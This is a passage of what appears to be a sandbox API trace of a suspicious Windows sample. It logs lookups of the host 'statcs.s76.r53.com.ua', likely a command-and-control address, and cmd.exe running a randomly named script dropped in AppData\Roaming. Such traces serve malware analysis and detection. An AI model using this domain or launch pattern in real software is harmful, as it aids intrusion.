wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, 
wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, 
wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xc, wMilliseconds=0xab)) [0098.715] VirtualFree (lpAddress=0x1410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.716] FreeLibrary (hLibModule=0x76910000) returned 1 [0098.716] LocalFree (hMem=0x724438) returned 0x0 [0098.717] FreeLibrary (hLibModule=0x76910000) returned 1 [0098.717] LocalFree (hMem=0x724428) returned 0x0 [0098.717] ExitProcess (uExitCode=0x0) Thread: id = 29 os_tid = 0xbdc [0098.139] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 21 [0098.139] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x1508514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0098.139] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1541ffc, cbMultiByte=27, lpWideCharStr=0x3fed38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0098.139] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0098.139] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x14fa714, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0098.139] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.139] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x150867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0098.139] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x3ffb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x3ffbac | out: ppResult=0x3ffbac*=0x0) returned 11001 [0098.228] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x3ffb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, 
ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x3ffbac | out: ppResult=0x3ffbac*=0x0) returned 11001 [0098.274] getnameinfo (in: pSockaddr=0x3ffc14, SockaddrLength=0x0, pNodeBuffer=0x146bc7c, NodeBufferSize=0x401, pServiceBuffer=0x1525124, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="s", pServiceBuffer="") returned 10047 [0098.274] htons (hostshort=0x0) returned 0x0 [0098.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0098.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] SetEvent (hEvent=0x84) returned 1 [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] GetCurrentThreadId () returned 0xbdc [0098.274] CloseHandle (hObject=0xb8) returned 1 [0098.274] RtlExitUserThread (Status=0x0) Thread: id = 30 os_tid = 0xbe0 Process: id = "21" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16900" os_pid = "0xbcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0xb74" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1353 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1354 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1355 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1356 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1357 start_va = 0x4a0f0000 end_va = 0x4a13bfff entry_point = 0x4a0f0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1358 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1359 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1360 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1361 start_va = 
0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1362 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1593 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1594 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1595 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1596 start_va = 0x2a0000 end_va = 0x306fff entry_point = 0x2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1597 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1598 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1599 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1600 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1601 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: 
"c:\\windows\\system32\\kernel32.dll") Region: id = 1602 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1603 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1604 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1605 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1606 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1607 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1608 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1609 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1610 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1611 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = 
"" Region: id = 1612 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1613 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1614 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1615 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1616 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 1617 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1618 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1619 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1620 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1630 start_va = 0x1300000 end_va = 0x15cefff entry_point = 0x1300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 28 os_tid = 0xbd0 [0099.540] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fdc4 | out: 
lpSystemTimeAsFileTime=0x16fdc4*(dwLowDateTime=0x7956f660, dwHighDateTime=0x1d440a9)) [0099.540] GetCurrentProcessId () returned 0xbcc [0099.540] GetCurrentThreadId () returned 0xbd0 [0099.540] GetTickCount () returned 0x23c73 [0099.540] QueryPerformanceCounter (in: lpPerformanceCount=0x16fdbc | out: lpPerformanceCount=0x16fdbc*=15632935145) returned 1 [0099.541] GetModuleHandleA (lpModuleName=0x0) returned 0x4a0f0000 [0099.541] __set_app_type (_Type=0x1) [0099.541] __p__fmode () returned 0x76b331f4 [0099.541] __p__commode () returned 0x76b331fc [0099.541] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1121a6) returned 0x0 [0099.541] __getmainargs (in: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c, _DoWildCard=0, _StartInfo=0x4a114140 | out: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c) returned 0 [0099.541] GetCurrentThreadId () returned 0xbd0 [0099.541] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbd0) returned 0x38 [0099.541] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0099.541] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0099.541] SetThreadUILanguage (LangId=0x0) returned 0x409 [0099.541] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.541] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fd54 | out: phkResult=0x16fd54*=0x0) returned 0x2 [0099.542] VirtualQuery (in: lpAddress=0x16fd8b, lpBuffer=0x16fd24, dwLength=0x1c | out: lpBuffer=0x16fd24*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0099.542] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fd24, dwLength=0x1c | out: lpBuffer=0x16fd24*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, 
RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0099.542] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fd24, dwLength=0x1c | out: lpBuffer=0x16fd24*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0099.542] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fd24, dwLength=0x1c | out: lpBuffer=0x16fd24*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0099.542] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fd24, dwLength=0x1c | out: lpBuffer=0x16fd24*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0099.542] GetConsoleOutputCP () returned 0x1b5 [0099.542] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0099.542] SetConsoleCtrlHandler (HandlerRoutine=0x4a10e72a, Add=1) returned 1 [0099.542] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.542] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0099.542] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.542] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0099.542] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.542] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0099.542] _get_osfhandle (_FileHandle=0) returned 0x3 [0099.542] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0099.543] _get_osfhandle (_FileHandle=0) returned 0x3 [0099.543] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0099.543] GetEnvironmentStringsW () returned 0x1b0150* [0099.543] FreeEnvironmentStringsW (penv=0x1b0150) returned 1 [0099.543] GetEnvironmentStringsW () returned 0x1b0150* [0099.543] FreeEnvironmentStringsW (penv=0x1b0150) returned 1 
[0099.543] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ecc4 | out: phkResult=0x16ecc4*=0x40) returned 0x0 [0099.543] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x0, lpData=0x16ecd0*=0x0, lpcbData=0x16ecc8*=0x1000) returned 0x2 [0099.543] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x4, lpData=0x16ecd0*=0x1, lpcbData=0x16ecc8*=0x4) returned 0x0 [0099.543] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x0, lpData=0x16ecd0*=0x1, lpcbData=0x16ecc8*=0x1000) returned 0x2 [0099.543] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x4, lpData=0x16ecd0*=0x0, lpcbData=0x16ecc8*=0x4) returned 0x0 [0099.543] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x4, lpData=0x16ecd0*=0x40, lpcbData=0x16ecc8*=0x4) returned 0x0 [0099.543] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x4, lpData=0x16ecd0*=0x40, lpcbData=0x16ecc8*=0x4) returned 0x0 [0099.543] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x0, lpData=0x16ecd0*=0x40, lpcbData=0x16ecc8*=0x1000) returned 0x2 [0099.543] RegCloseKey (hKey=0x40) returned 0x0 [0099.543] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ecc4 | out: phkResult=0x16ecc4*=0x40) returned 0x0 [0099.543] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x0, lpData=0x16ecd0*=0x40, lpcbData=0x16ecc8*=0x1000) returned 0x2 [0099.544] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x4, lpData=0x16ecd0*=0x1, lpcbData=0x16ecc8*=0x4) returned 0x0 [0099.544] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x0, lpData=0x16ecd0*=0x1, lpcbData=0x16ecc8*=0x1000) returned 0x2 [0099.544] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x4, lpData=0x16ecd0*=0x0, lpcbData=0x16ecc8*=0x4) returned 0x0 [0099.544] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x4, lpData=0x16ecd0*=0x9, lpcbData=0x16ecc8*=0x4) returned 0x0 [0099.544] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x4, lpData=0x16ecd0*=0x9, lpcbData=0x16ecc8*=0x4) returned 0x0 [0099.544] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x0, lpData=0x16ecd0*=0x9, lpcbData=0x16ecc8*=0x1000) returned 0x2 [0099.544] RegCloseKey (hKey=0x40) returned 0x0 [0099.544] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88634c [0099.544] srand (_Seed=0x5b88634c) [0099.544] 
GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd\"" [0099.544] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd\"" [0099.544] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0099.544] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b19b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0099.544] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0099.544] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.544] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") 